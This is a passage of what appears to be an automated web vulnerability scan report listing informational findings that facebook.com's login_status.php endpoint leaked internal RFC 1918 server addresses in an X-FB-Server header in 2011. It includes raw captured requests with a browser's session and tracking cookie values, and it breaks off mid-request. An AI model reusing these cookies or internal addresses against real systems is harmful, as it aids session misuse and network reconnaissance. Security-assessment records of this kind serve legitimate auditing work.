Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.190.37

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3236ba9d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa5bf6cf%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df73812d74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5a364168%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2807ef474%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff283df9574%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1bc6f16a8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f5a364168&origin=http%3A%2F%2Faol.sportingnews.com%2Ff283df9574&relation=parent&transport=postmessage&frame=f1bc6f16a8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.190.37
X-Cnection: close
Date: Thu, 05 May 2011 01:27:49 GMT
Content-Length: 0

20.77. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.54.123

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d8ed7f78%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d7359dc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3689dcef%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df301acf0fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df25bc9b49%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff16c94d68%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df264d779a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f301acf0fc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff16c94d68&relation=parent&transport=postmessage&frame=f264d779a4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.54.123
X-Cnection: close
Date: Thu, 05 May 2011 02:08:21 GMT
Content-Length: 0

20.78. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.34

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfbca519a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26d65d1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3da78930%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcc116d64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2df0957e%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1cbbb31d%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df139869c7c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fcc116d64&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1cbbb31d&relation=parent&transport=postmessage&frame=f139869c7c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.152.34
X-Cnection: close
Date: Thu, 05 May 2011 01:30:47 GMT
Content-Length: 0

20.79. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.64.29

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3db43803%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ef9b0e68%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2738467b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1bc83614%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b27cb628%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff39b2eecc8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3bc242cf&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1bc83614&origin=http%3A%2F%2Faol.sportingnews.com%2Ff39b2eecc8&relation=parent&transport=postmessage&frame=f3bc242cf
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.64.29
X-Cnection: close
Date: Thu, 05 May 2011 01:40:34 GMT
Content-Length: 0

20.80. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.69.63

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfee579ebc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e8fdbe9%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9540f77c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e4056f3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df119d5b63%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff1450dca4c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df13244f834&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1e4056f3&origin=http%3A%2F%2Faol.sportingnews.com%2Ff1450dca4c&relation=parent&transport=postmessage&frame=f13244f834
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.69.63
X-Cnection: close
Date: Thu, 05 May 2011 00:58:34 GMT
Content-Length: 0

20.81. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.149.125

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df328777d1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df58ac4d98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df31b5fd2%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df352e95b5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39d335744%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff163ac1304%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2fdf60c54&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f352e95b5&origin=http%3A%2F%2Faol.sportingnews.com%2Ff163ac1304&relation=parent&transport=postmessage&frame=f2fdf60c54
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.149.125
X-Cnection: close
Date: Thu, 05 May 2011 01:08:17 GMT
Content-Length: 0

20.82. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.193.59

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df7d891404%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17660a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfac36936c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f0d96edc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a9bebd38%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18a587ed8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a7263a1&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=5D0Du; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2FToP-SeCNeT%2F195242630519520; wd=1124x1058

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1f0d96edc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff18a587ed8&relation=parent&transport=postmessage&frame=f3a7263a1
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.193.59
X-Cnection: close
Date: Thu, 05 May 2011 02:15:04 GMT
Content-Length: 0

20.83. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.183.62

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df217a13dac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc7d6a30%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3a7952c88%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3746fb4b4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1900db7fc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2e1582544%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfd60468a4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3746fb4b4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2e1582544&relation=parent&transport=postmessage&frame=fd60468a4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.183.62
X-Cnection: close
Date: Thu, 05 May 2011 01:31:58 GMT
Content-Length: 0

20.84. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.76.79

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b21a0e64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df18a1dcce4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f2885b3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df304014ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24da0ac2c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37c740fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1d7f588f&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f304014ac&origin=http%3A%2F%2Faol.sportingnews.com%2Ff37c740fc&relation=parent&transport=postmessage&frame=f1d7f588f
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.76.79
X-Cnection: close
Date: Thu, 05 May 2011 01:37:36 GMT
Content-Length: 0

20.85. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.137.126

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2e397152%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b8848144%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a449b64%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff311f4ad5%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df11aab8794&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df355898d4%26origin%3D